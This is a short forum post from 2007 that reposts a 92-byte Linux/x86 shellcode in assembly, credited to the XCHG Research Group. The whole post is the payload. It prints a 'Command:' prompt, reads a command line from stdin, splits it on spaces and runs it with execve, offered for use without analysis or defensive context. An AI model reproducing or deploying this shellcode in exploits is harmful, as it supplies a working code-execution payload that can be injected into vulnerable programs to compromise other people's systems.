猪猪 2007-2-3 22:27
linux/x86 execve read shellcode - 92 bytes
[code]# XCHG Research Group
# Linux/x86 execve read shellcode - 92 bytes
#
#
# )--[ Writed by 0ut0fbound ]--(
#
# - [url]http://outofbound.host.sk[/url]
# - [url]http://xchglabs.host.sk[/url]
.text
.globl _start
_start:
# EAX = 0x04 -> syscall write()
xorl %eax, %eax
movb $0x4, %al
xorl %ebx, %ebx
inc %ebx
pushl $0x20202020
pushl $0x3a646e61
pushl $0x6d6d6f43
movl %esp, %ecx
xorl %edx, %edx
movb $0x9, %dl
int $0x80
# EAX = 0x03 -> syscall read()
xorl %eax, %eax
movb $0x3, %al
xorl %ebx, %ebx
xorl %edx, %edx
movb $0x20, %dl
subl %edx, %esp
movl %esp, %ecx
int $0x80
# buffer[read(0, buffer, sizeof(buffer))] = 0;
addl %eax, %ecx
dec %ecx
movl %ebx, (%ecx)
movl %esp, %ebx
addl %eax, %ebx
movl %eax, %ecx
xorl %edx, %edx
push %edx
LOOP1:
movb (%ebx), %al
cmp $0x20, %al
jne CONT
xorb $0x20, (%ebx)
inc %ebx
pushl %ebx
dec %ebx
CONT:
dec %ebx
loop LOOP1
push %ebx
movl %esp, %ecx
xorl %eax, %eax
movb $0xb, %al
int $0x80
# EAX = 0x01 -> syscall exit
xorl %eax, %eax
inc %al
xorl %ebx, %ebx
int $0x80 [/code]